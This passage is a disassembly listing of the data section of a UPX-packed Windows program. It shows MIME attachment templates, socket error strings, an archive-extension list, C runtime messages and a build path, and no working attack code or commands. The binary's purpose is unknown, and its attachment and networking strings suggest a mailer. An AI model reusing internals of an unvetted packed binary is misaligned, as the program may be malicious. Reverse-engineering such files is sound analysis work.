; sub_415460+D6�o ...
db 0Dh,0Ah,0
asc_424CB0 db '--',0Dh,0Ah,0 ; DATA XREF: sub_415690+3E�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: UPX0:off_42A004�o
align 4
aImagePng db 'image/png',0 ; DATA XREF: UPX0:0042A034�o
align 4
a_png db '.png',0 ; DATA XREF: UPX0:0042A030�o
align 10h
aImageBmp db 'image/bmp',0 ; DATA XREF: UPX0:0042A02C�o
align 4
a_bmp db '.bmp',0 ; DATA XREF: UPX0:0042A028�o
align 4
aImageJpeg db 'image/jpeg',0 ; DATA XREF: UPX0:0042A024�o
align 10h
a_jpg db '.jpg',0 ; DATA XREF: UPX0:0042A020�o
align 4
aImageGif db 'image/gif',0 ; DATA XREF: UPX0:0042A01C�o
align 4
a_gif db '.gif',0 ; DATA XREF: UPX0:0042A018�o
align 4
aApplicationVnd db 'application/vnd.ms-excel',0 ; DATA XREF: UPX0:0042A014�o
align 4
a_xls db '.xls',0 ; DATA XREF: UPX0:0042A010�o
align 10h
aApplicationPdf db 'application/pdf',0 ; DATA XREF: UPX0:off_42A00C�o
a_pdf db '.pdf',0 ; DATA XREF: UPX0:off_42A008�o
align 4
aContentTypeSNa db 'Content-Type: %s;',0Dh,0Ah ; DATA XREF: sub_415AE0+150�o
db ' name="%s"',0Dh,0Ah,0
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_415AE0:loc_415C07�o
align 4
aContentType_0 db 'Content Type',0 ; DATA XREF: sub_415AE0+A7�o
align 4
aUnexpectedErro db 'unexpected error %d from winsock',0 ; DATA XREF: sub_415CE0+1B5�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_415CE0:loc_415D6B�o
aConnectionGe_0 db 'connection::get_buffer() unexpected error: %d',0
; DATA XREF: sub_415F90+105�o
align 4
aConnectionGet_ db 'connection::get_buffer() unexpected error from select: %d',0
; DATA XREF: sub_415F90+78�o
align 4
aConnectionPu_0 db 'connection::put_data() unexpected error from send(): %d',0
; DATA XREF: sub_4160F0+E0�o
aConnectionPut_ db 'connection::put_data() unexpected error from select: %d',0
; DATA XREF: sub_4160F0+72�o
a_z_zip_zoo_arc db '.Z:.zip:.zoo:.arc:.lzh:.arj',0 ; DATA XREF: UPX0:0042A05C�o
off_424EF4 dd offset loc_419050 ; DATA XREF: sub_418F60+8�o
; sub_418F90+1D�o
dd offset sub_41AC2A
dd offset dword_4261F4
off_424F00 dd offset loc_4191F0 ; DATA XREF: sub_4191E5�o
; UPX0:00419218�o ...
dd offset sub_41ACF6
dword_424F08 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh ; DATA XREF: sub_419224+25�o
stru_424F18 _msEH <0FFFFFFFFh, offset loc_4192A2, offset loc_4192A6>
; DATA XREF: sub_419224+63�o
align 8
stru_424F28 _msEH <0FFFFFFFFh, offset loc_419B14, offset loc_419B18>
; DATA XREF: sub_419A76+2�o
align 8
stru_424F38 _msEH <0FFFFFFFFh, 0, offset sub_419D93> ; DATA XREF: sub_419D24+2�o
align 8
stru_424F48 _msEH <0FFFFFFFFh, 0, offset sub_419E30> ; DATA XREF: sub_419DDD+2�o
align 8
stru_424F58 _msEH <0FFFFFFFFh, 0, offset sub_419EE0> ; DATA XREF: sub_419E9A+2�o
align 8
stru_424F68 _msEH <0FFFFFFFFh, 0, offset sub_41A034> ; DATA XREF: sub_419FF2+2�o
align 8
stru_424F78 _msEH <0FFFFFFFFh, 0, offset sub_41A090> ; DATA XREF: sub_41A03E+2�o
align 8
stru_424F88 _msEH <0FFFFFFFFh, offset loc_41A14B, offset loc_41A14F>
; DATA XREF: sub_41A0AD+2�o
align 8
stru_424F98 _msEH <0FFFFFFFFh, 0, offset sub_41A29B> ; DATA XREF: sub_41A269+2�o
dword_424FA4 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_41A2B3+E�o
dd 3, 19930520h, 2 dup(0)
dd offset dword_426238
off_424FC8 dd offset sub_41A389 ; DATA XREF: sub_41A343+E�o
; UPX0:00429F58�o ...
align 10h
stru_424FD0 _msEH <0FFFFFFFFh, 0, offset sub_41A380> ; DATA XREF: sub_41A343+2�o
align 10h
stru_424FE0 _msEH <0FFFFFFFFh, offset sub_41A692, offset loc_41A6A6>
; DATA XREF: start-65817�o
align 10h
stru_424FF0 _msEH <0FFFFFFFFh, 0, offset sub_41AC1F> ; DATA XREF: sub_41ABD2+2�o
dd offset dword_426264
off_425000 dd offset loc_41AD03 ; DATA XREF: sub_41AC59+8�o
; sub_41AC96+8�o ...
dd offset sub_41ACF6
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_41ACF6+7�o
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: UPX0:0041AEB7�o
; sub_41FB3B+123�o
align 4
aProgram db 'Program: ',0 ; DATA XREF: UPX0:0041AE8D�o
align 10h
asc_425050 db 0Ah ; DATA XREF: UPX0:0041AE81�o
; sub_41FB3B+107�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: UPX0:0041AE51�o
; sub_41FB3B+C1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: UPX0:0041AE10�o
; sub_41FB3B+8E�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: UPX0:0041ADE7�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: UPX0:loc_41ADE2�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: UPX0:0041ADD1�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: UPX0:0041ADCC�o
align 4
stru_425208 _msEH <0FFFFFFFFh, offset loc_41ADBD, offset loc_41ADC1>
; DATA XREF: UPX0:0041AD8A�o
align 8
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 20h, 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh
stru_425398 _msEH <0FFFFFFFFh, 0, offset sub_41B301> ; DATA XREF: sub_41B2CF+2�o
align 8
stru_4253A8 _msEH <0FFFFFFFFh, 0, offset sub_41B4CE> ; DATA XREF: sub_41B3A1+2�o
dd 0FFFFFFFFh, 0
dd offset sub_41B4DC
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_41B4E8+4C�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_41B4E8+3F�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_41B4E8+32�o
aFlsalloc db 'FlsAlloc',0 ; DATA XREF: sub_41B4E8+2A�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_41B4E8+13�o
; sub_421D85+1E�o
align 10h
stru_425400 _msEH <0FFFFFFFFh, 0, offset sub_41B6F1> ; DATA XREF: sub_41B644+2�o
align 10h
dd offset loc_41B6B7
dd offset loc_41B6C0
stru_425418 _msEH <0FFFFFFFFh, offset sub_41B746, offset loc_41B74F>
; DATA XREF: sub_41B712+2�o
align 8
stru_425428 _msEH <0FFFFFFFFh, 0, offset sub_41B8C5> ; DATA XREF: sub_41B776+2�o
align 8
dd offset loc_41B801
dd offset loc_41B850
stru_425440 _msEH <0FFFFFFFFh, offset sub_41BAAA, offset loc_41BAAE>
; DATA XREF: sub_41B93A+2�o
align 10h
stru_425450 _msEH <0FFFFFFFFh, offset loc_41BEA6, offset loc_41BEAA>
; DATA XREF: sub_41BE81+2�o
align 10h
stru_425460 _msEH <0FFFFFFFFh, offset loc_41BED3, offset loc_41BED7>
; DATA XREF: sub_41BEB6+2�o
dword_42546C dd 0 ; DATA XREF: sub_41C18B+1C�o
; sub_420DD8+1E�o
stru_425470 _msEH <0FFFFFFFFh, offset loc_41C484, offset loc_41C488>
; DATA XREF: sub_41C18B+2�o
; sub_41C6EE+5E�r
dd 0FFFFFFFFh, 41C281h, 41C285h, 0FFFFFFFFh, 41C34Fh, 41C353h
dd 0
byte_425498 db 6 ; DATA XREF: sub_41C6EE:loc_41C75A�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: UPX0:off_42A714�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: UPX0:off_42A710�o
align 10h
stru_425510 _msEH <0FFFFFFFFh, 0, offset sub_41D0DE> ; DATA XREF: sub_41D047+2�o
align 10h
stru_425520 _msEH <0FFFFFFFFh, 0, offset sub_41DD9D> ; DATA XREF: sub_41DD29+2�o
align 10h
stru_425530 _msEH <0FFFFFFFFh, 0, offset sub_41DF46> ; DATA XREF: sub_41DE7A+2�o
dd 2 dup(0)
dd offset sub_41DF15
stru_425548 _msEH <0FFFFFFFFh, 0, offset sub_41E1AA> ; DATA XREF: sub_41E126+2�o
align 8
stru_425558 _msEH <0FFFFFFFFh, 0, offset sub_41E820> ; DATA XREF: sub_41E70A+2�o
align 8
stru_425568 _msEH <0FFFFFFFFh, 0, offset sub_41E98C> ; DATA XREF: sub_41E82C+2�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_41E9D9+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_41E9D9�o
stru_425590 _msEH <0FFFFFFFFh, 0, offset loc_41EB47> ; DATA XREF: sub_41EA9D+2�o
align 10h
stru_4255A0 _msEH <0FFFFFFFFh, 0, offset sub_41EC0A> ; DATA XREF: sub_41EBA0+2�o
align 10h
stru_4255B0 _msEH <0FFFFFFFFh, offset loc_41F358, offset loc_41F35C>
; DATA XREF: sub_41ED2E+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh
db 0
db 3 dup(0)
dd 414D4F44h, 65204E49h
db 72h ; r
db 72h ; r
db 6Fh ; o
db 72h ; r
db 0Dh
db 0Ah
db 0
db 0
align 10h
dd 32303652h
db 39h, 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 54h ; T
db 68h ; h
db 69h ; i
db 73h ; s
db 20h
db 61h ; a
db 70h ; p
db 70h ; p
db 6Ch ; l
db 69h ; i
db 63h ; c
db 61h ; a
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 20h
db 63h ; c
db 61h ; a
db 6Eh ; n
db 6Eh ; n
db 6Fh ; o
db 74h ; t
db 20h
db 72h ; r
db 75h ; u
db 6Eh ; n
db 20h
db 75h ; u
db 73h ; s
db 69h ; i
db 6Eh ; n
db 67h ; g
db 20h
db 74h ; t
db 68h ; h
db 65h ; e
db 20h
db 61h ; a
db 63h ; c
db 74h ; t
db 69h ; i
db 76h ; v
db 65h ; e
db 20h
db 76h ; v
db 65h ; e
db 72h ; r
db 73h ; s
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 20h
db 6Fh ; o
db 66h ; f
db 20h
db 74h ; t
db 68h ; h
db 65h ; e
db 20h
db 4Dh ; M
db 69h ; i
db 63h ; c
db 72h ; r
db 6Fh ; o
db 73h ; s
db 6Fh ; o
db 66h ; f
db 74h ; t
db 20h
db 2Eh ; .
db 4Eh ; N
db 45h ; E
db 54h ; T
db 20h
db 52h ; R
db 75h ; u
db 6Eh ; n
db 74h ; t
db 69h ; i
db 6Dh ; m
db 65h ; e
db 0Ah
db 50h ; P
db 6Ch ; l
db 65h ; e
db 61h ; a
db 73h ; s
db 65h ; e
db 20h
db 63h ; c
db 6Fh ; o
db 6Eh ; n
db 74h ; t
db 61h ; a
db 63h ; c
db 74h ; t
db 20h
db 74h ; t
db 68h ; h
db 65h ; e
db 20h
db 61h ; a
db 70h ; p
db 70h ; p
db 6Ch ; l
db 69h ; i
db 63h ; c
db 61h ; a
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 27h ; '
db 73h ; s
db 20h
db 73h ; s
db 75h ; u
db 70h ; p
db 70h ; p
db 6Fh ; o
db 72h ; r
db 74h ; t
db 20h
db 74h ; t
db 65h ; e
db 61h ; a
db 6Dh ; m
db 20h
db 66h ; f
db 6Fh ; o
db 72h ; r
db 20h
db 6Dh ; m
db 6Fh ; o
db 72h ; r
db 65h ; e
db 20h
db 69h ; i
db 6Eh ; n
db 66h ; f
db 6Fh ; o
db 72h ; r
db 6Dh ; m
db 61h ; a
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 2Eh ; .
db 0Dh
db 0Ah
db 0
db 0
db 0
db 52h ; R
db 36h ; 6
db 30h ; 0
db 32h ; 2
db 38h ; 8
db 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 75h ; u
db 6Eh ; n
db 61h ; a
db 62h ; b
db 6Ch ; l
db 65h ; e
db 20h
db 74h ; t
db 6Fh ; o
db 20h
db 69h ; i
db 6Eh ; n
db 69h ; i
db 74h ; t
db 69h ; i
db 61h ; a
db 6Ch ; l
db 69h ; i
db 7Ah ; z
db 65h ; e
db 20h
db 68h ; h
db 65h ; e
db 61h ; a
db 70h ; p
db 0Dh
db 0Ah
db 0
db 3 dup(0)
dd 32303652h, 2D0A0D37h
db 20h
db 6Eh ; n
db 6Fh ; o
db 74h ; t
db 20h
db 65h ; e
db 6Eh ; n
db 6Fh ; o
db 75h ; u
db 67h ; g
db 68h ; h
db 20h
db 73h ; s
db 70h ; p
db 61h ; a
db 63h ; c
db 65h ; e
db 20h
db 66h ; f
db 6Fh ; o
db 72h ; r
db 20h
db 6Ch ; l
db 6Fh ; o
db 77h ; w
db 69h ; i
db 6Fh ; o
db 20h
db 69h ; i
db 6Eh ; n
db 69h ; i
db 74h ; t
db 69h ; i
db 61h ; a
db 6Ch ; l
db 69h ; i
db 7Ah ; z
db 61h ; a
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 0Dh
db 0Ah
db 0
db 0
db 0
db 0
db 52h ; R
db 36h ; 6
db 30h ; 0
db 32h ; 2
db 36h ; 6
db 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 6Eh ; n
db 6Fh ; o
db 74h ; t
db 20h
db 65h ; e
db 6Eh ; n
db 6Fh ; o
db 75h ; u
db 67h ; g
db 68h ; h
db 20h
db 73h ; s
db 70h ; p
db 61h ; a
db 63h ; c
db 65h ; e
db 20h
db 66h ; f
db 6Fh ; o
db 72h ; r
db 20h
db 73h ; s
db 74h ; t
db 64h ; d
db 69h ; i
db 6Fh ; o
db 20h
db 69h ; i
db 6Eh ; n
db 69h ; i
db 74h ; t
db 69h ; i
db 61h ; a
db 6Ch ; l
db 69h ; i
db 7Ah ; z
db 61h ; a
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 0Dh
db 0Ah
db 0
db 0
dw 0
dd 32303652h
db 35h, 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 70h ; p
db 75h ; u
db 72h ; r
db 65h ; e
db 20h
db 76h ; v
db 69h ; i
db 72h ; r
db 74h ; t
db 75h ; u
db 61h ; a
db 6Ch ; l
db 20h
db 66h ; f
db 75h ; u
db 6Eh ; n
db 63h ; c
db 74h ; t
db 69h ; i
db 6Fh ; o
db 6Eh ; n
db 20h
db 63h ; c
db 61h ; a
db 6Ch ; l
db 6Ch ; l
db 0Dh
db 0Ah
db 0
db 0
db 0
db 52h ; R
db 36h ; 6
db 30h ; 0
db 32h ; 2
db 34h ; 4
db 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 6Eh ; n
db 6Fh ; o
db 74h ; t
db 20h
db 65h ; e
db 6Eh ; n
db 6Fh ; o
db 75h ; u
db 67h ; g
db 68h ; h
db 20h
db 73h ; s
db 70h ; p
db 61h ; a
db 63h ; c
db 65h ; e
db 20h
db 66h ; f
db 6Fh ; o
db 72h ; r
db 20h
db 5Fh ; _
db 6Fh ; o
db 6Eh ; n
db 65h ; e
db 78h ; x
db 69h ; i
db 74h ; t
db 2Fh ; /
db 61h ; a
db 74h ; t
db 65h ; e
db 78h ; x
db 69h ; i
db 74h ; t
db 20h
db 74h ; t
db 61h ; a
db 62h ; b
db 6Ch ; l
db 65h ; e
db 0Dh
db 0Ah
db 0
db 3 dup(0)
dd 31303652h
db 39h, 0Dh
db 0Ah
db 2Dh ; -
db 20h
db 75h ; u
db 6Eh ; n
db 61h ; a
db 62h ; b
db 6Ch ; l
db 65h ; e
db 20h
db 74h ; t
db 6Fh ; o
db 20h
db 6Fh ; o
db 70h ; p
db 65h ; e
db 6Eh ; n
db 20h
db 63h ; c
db 6Fh ; o
db 6Eh ; n
db 73h ; s
db 6Fh ; o
db 6Ch ; l
db 65h ; e
db 20h
db 64h ; d
db 65h ; e
db 76h ; v
db 69h ; i
db 63h ; c
db 65h ; e
db 0Dh
db 0Ah
db 0
db 0
dw 0
dd 31303652h, 2D0A0D38h, 656E7520h, 63657078h, 20646574h
db 68h
db 65h ; e
db 61h ; a
db 70h ; p
db 20h
db 65h ; e
db 72h ; r
db 72h ; r
db 6Fh ; o
db 72h ; r
db 0Dh
db 0Ah
db 0
db 3 dup(0)
; ---------------------------------------------------------------------------
push edx
xor ss:[ecx], dh
aaa
or eax, 75202D0Ah
outsb
db 65h
js short near ptr loc_425866+4
arpl gs:[ebp+64h], si
and [ebp+75h], ch
insb
jz short near ptr loc_42586C+2
jz short loc_42586F
jb short near ptr loc_42586C+2
popa
and fs:[edi+ebp*2+63h], ch
imul esp, [eax], 65h
jb short near ptr loc_425885+1
outsd
jb short near ptr loc_425820+4
or al, [eax]
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
push edx
xor ss:[ecx], dh
loc_425820: ; CODE XREF: UPX0:00425815�j
db 36h
or eax, 6E202D0Ah
outsd
jz short near ptr loc_425845+4
outs dx, byte ptr gs:[esi]
outsd
jnz short loc_425895
push 61707320h
arpl [ebp+20h], sp
outsw
jb short loc_42585A
jz short loc_4258A4
jb short near ptr loc_4258A2+1
popa
and fs:[ecx+74h], ah
popa
loc_425845: ; CODE XREF: UPX0:00425827�j
or eax, 0A0D000Ah
push esp
push 61207369h
jo short near ptr loc_4258C0+2
insb
imul esp, [ebx+61h], 6E6F6974h
loc_42585A: ; CODE XREF: UPX0:00425838�j
and [eax+61h], ch
jnb short near ptr loc_42587C+3
jb short near ptr loc_4258C5+1
jno short loc_4258D8
db 65h
jnb short loc_4258DA
loc_425866: ; CODE XREF: UPX0:004257F7�j
db 65h
and fs:[eax+ebp*2+65h], dh
loc_42586C: ; CODE XREF: UPX0:00425803�j
; UPX0:00425807�j
and [edx+75h], dl
loc_42586F: ; CODE XREF: UPX0:00425805�j
outsb
jz short near ptr loc_4258DA+1
insd
and gs:[edi+ebp*2+20h], dh
jz short near ptr loc_4258DA+5
jb short near ptr loc_4258E4+5
loc_42587C: ; CODE XREF: UPX0:0042585D�j
imul ebp, [esi+61h], 69206574h
jz short near ptr loc_4258A4+1
loc_425885: ; CODE XREF: UPX0:00425812�j
imul ebp, [esi+20h], 75206E61h
outsb
jnz short loc_425902
jnz short loc_4258F2
insb
and [edi+61h], dh
loc_425895: ; CODE XREF: UPX0:0042582C�j
jns short loc_4258C5
or dl, [eax+6Ch]
db 65h
popa
jnb short near ptr loc_425902+1
and [ebx+6Fh], ah
outsb
loc_4258A2: ; CODE XREF: UPX0:0042583C�j
jz short loc_425905
loc_4258A4: ; CODE XREF: UPX0:0042583A�j
; UPX0:00425883�j
arpl [eax+74h], si
push 70612065h
jo short loc_42591B
imul esp, [ebx+61h], 6E6F6974h
daa
jnb short loc_4258D9
jnb short near ptr loc_42592F+1
jo short loc_42592D
outsd
jb short near ptr loc_425933+1
loc_4258C0: ; CODE XREF: UPX0:00425850�j
and [ebp+61h], dh
insd
loc_4258C5: ; CODE XREF: UPX0:loc_425895�j
; UPX0:0042585F�j
and [esi+6Fh], ah
jb short loc_4258EA
insd
outsd
jb short loc_425933
and [ecx+6Eh], ch
outsw
jb short near ptr aR6002FloatingP+0Ah
popa
jz short near ptr aR6002FloatingP+9
loc_4258D8: ; CODE XREF: UPX0:00425861�j
outsd
loc_4258D9: ; CODE XREF: UPX0:004258B7�j
outsb
loc_4258DA: ; CODE XREF: UPX0:00425863�j
; UPX0:00425870�j ...
db 2Eh
or eax, 0Ah
push edx
xor ss:[eax], dh
loc_4258E4: ; CODE XREF: UPX0:0042587A�j
cmp ds:6E202D0Ah, ecx
loc_4258EA: ; CODE XREF: UPX0:004258C8�j
outsd
jz short loc_42590D
outs dx, byte ptr gs:[esi]
outsd
jnz short near ptr aR6002FloatingP+21h
loc_4258F2: ; CODE XREF: UPX0:0042588F�j
push 61707320h
arpl [ebp+20h], sp
outsw
jb short loc_42591E
outs dx, byte ptr gs:[esi]
jbe short near ptr aRuntimeErrorPr+0Bh
loc_425902: ; CODE XREF: UPX0:0042588D�j
; UPX0:0042589C�j
jb short near ptr aRuntimeErrorPr+13h
outsb
loc_425905: ; CODE XREF: UPX0:loc_4258A2�j
insd
outs dx, byte ptr gs:[esi]
jz short loc_425917
or al, [eax]
push edx
loc_42590D: ; CODE XREF: UPX0:004258EB�j
xor ss:[eax], dh
cmp ds:6E202D0Ah, cl
outsd
loc_425917: ; CODE XREF: UPX0:00425908�j
jz short near ptr aR6002FloatingP+1
outs dx, byte ptr gs:[esi]
loc_42591B: ; CODE XREF: UPX0:004258AD�j
outsd
jnz short near ptr stru_425980.FilterProc+1
loc_42591E: ; CODE XREF: UPX0:004258FC�j
push 61707320h
arpl [ebp+20h], sp
outsw
jb short near ptr aR6002FloatingP+12h
popa
jb short near ptr stru_425990.FilterProc
loc_42592D: ; CODE XREF: UPX0:004258BB�j
jnz short near ptr dword_42599C
loc_42592F: ; CODE XREF: UPX0:004258B9�j
outs dx, byte ptr gs:[esi]
jz short near ptr word_4259A6
loc_425933: ; CODE XREF: UPX0:004258CC�j
; UPX0:004258BE�j
or eax, 0Ah
; ---------------------------------------------------------------------------
aR6002FloatingP db 'R6002',0Dh,0Ah ; CODE XREF: UPX0:loc_425917�j
; UPX0:004258D6�j ...
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; CODE XREF: UPX0:00425900�j
; DATA XREF: sub_41FB3B+F5�o
db 0Ah
db 'Program: ',0
align 10h
stru_425980 _msEH <0FFFFFFFFh, offset loc_4204CE, offset loc_4204D2>
; CODE XREF: UPX0:0042591C�j
; DATA XREF: sub_4204A1+2�o
align 10h
stru_425990 _msEH <0FFFFFFFFh, offset loc_420512, offset loc_420516>
; CODE XREF: UPX0:0042592B�j
; DATA XREF: sub_4204E5+2�o
dword_42599C dd 2 dup(0) ; CODE XREF: UPX0:loc_42592D�j
db 2 dup(0)
word_4259A6 dw 0 ; CODE XREF: UPX0:00425931�j
dd 3Eh dup(0)
asc_425AA0: ; DATA XREF: UPX0:0042A5C0�o
; UPX0:off_42AB04�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_425CA0 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: UPX0:0042AB08�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dd 0
stru_425EA8 _msEH <0FFFFFFFFh, 0, offset sub_4205D0> ; DATA XREF: sub_420529+2�o
align 8
stru_425EB8 _msEH <0FFFFFFFFh, 0, offset sub_420676> ; DATA XREF: sub_41AB1A+5ACC�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_42067F+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_42067F+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_42067F+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_42067F+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_42067F+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_42067F+13�o
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: UPX0:0042ABC0�o
align 10h
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: UPX0:0042ABBC�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: UPX0:0042ABB8�o
align 10h
aPm db 'PM',0 ; DATA XREF: UPX0:0042ABB4�o
align 4
aAm db 'AM',0 ; DATA XREF: UPX0:0042ABB0�o
align 4
aDecember db 'December',0 ; DATA XREF: UPX0:0042ABAC�o
align 4
aNovember db 'November',0 ; DATA XREF: UPX0:0042ABA8�o
align 10h
aOctober db 'October',0 ; DATA XREF: UPX0:0042ABA4�o
aSeptember db 'September',0 ; DATA XREF: UPX0:0042ABA0�o
align 4
aAugust db 'August',0 ; DATA XREF: UPX0:0042AB9C�o
align 4
aJuly db 'July',0 ; DATA XREF: UPX0:0042AB98�o
align 4
aJune db 'June',0 ; DATA XREF: UPX0:0042AB94�o
align 4
aApril db 'April',0 ; DATA XREF: UPX0:0042AB8C�o
align 4
aMarch db 'March',0 ; DATA XREF: UPX0:0042AB88�o
align 4
aFebruary db 'February',0 ; DATA XREF: UPX0:0042AB84�o
align 4
aJanuary db 'January',0 ; DATA XREF: UPX0:0042AB80�o
aSaturday db 'Saturday',0 ; DATA XREF: UPX0:0042AB4C�o
align 4
aFriday db 'Friday',0 ; DATA XREF: UPX0:0042AB48�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: UPX0:0042AB44�o
align 10h
aWednesday db 'Wednesday',0 ; DATA XREF: UPX0:0042AB40�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: UPX0:0042AB3C�o
aMonday db 'Monday',0 ; DATA XREF: UPX0:0042AB38�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: UPX0:0042AB34�o
align 8
stru_426018 _msEH <0FFFFFFFFh, offset loc_420EB1, offset loc_420EB5>
; DATA XREF: sub_420DD8+2�o
align 8
stru_426028 _msEH <0FFFFFFFFh, 0, offset sub_4214DB> ; DATA XREF: sub_421394+2�o
align 8
stru_426038 _msEH <0FFFFFFFFh, offset loc_4219CA, offset loc_4219CE>
; DATA XREF: sub_4218F8+2�o
align 8
stru_426048 _msEH <0FFFFFFFFh, 0, offset sub_421BB9> ; DATA XREF: sub_421B35+2�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_421D85+2D�o
align 10h
stru_426080 _msEH <0FFFFFFFFh, offset loc_421DE2, offset loc_421DF0>
; DATA XREF: sub_421D85+2�o
align 10h
stru_426090 _msEH <0FFFFFFFFh, 0, offset sub_421FE0> ; DATA XREF: sub_421F4C+2�o
align 10h
stru_4260A0 _msEH <0FFFFFFFFh, 0, offset sub_422181> ; DATA XREF: sub_42200E+2�o
dd 2 dup(0)
dd offset sub_4220E1
stru_4260B8 _msEH <0FFFFFFFFh, 0, offset sub_422227> ; DATA XREF: sub_42218A+2�o
align 8
stru_4260C8 _msEH <0FFFFFFFFh, 0, offset sub_4225F5> ; DATA XREF: sub_4225B0+2�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 8
stru_426118 _msEH <0FFFFFFFFh, 0, offset sub_4229E2> ; DATA XREF: sub_4228AF+2�o
align 8
stru_426128 _msEH <0FFFFFFFFh, 0, offset sub_422DD1> ; DATA XREF: sub_422D4D+2�o
dd 53445352h, 0EA3386BFh, 47295F62h, 0F2426D84h, 0E60814Ah
dd 1, 705C3A65h, 775C6A72h, 5C73725Fh, 746E6573h, 6361622Eh
dd 6D775C6Bh, 6F735F66h, 6974756Ch, 662E6E6Fh, 5C352E72h
dd 5F666D77h, 756C6F73h, 6E6F6974h, 2E37312Eh, 69625C63h
dd 65725F6Eh, 7361656Ch, 6D775C65h, 657A5F66h, 6E617078h
dd 6E6F6973h, 6264702Eh, 0
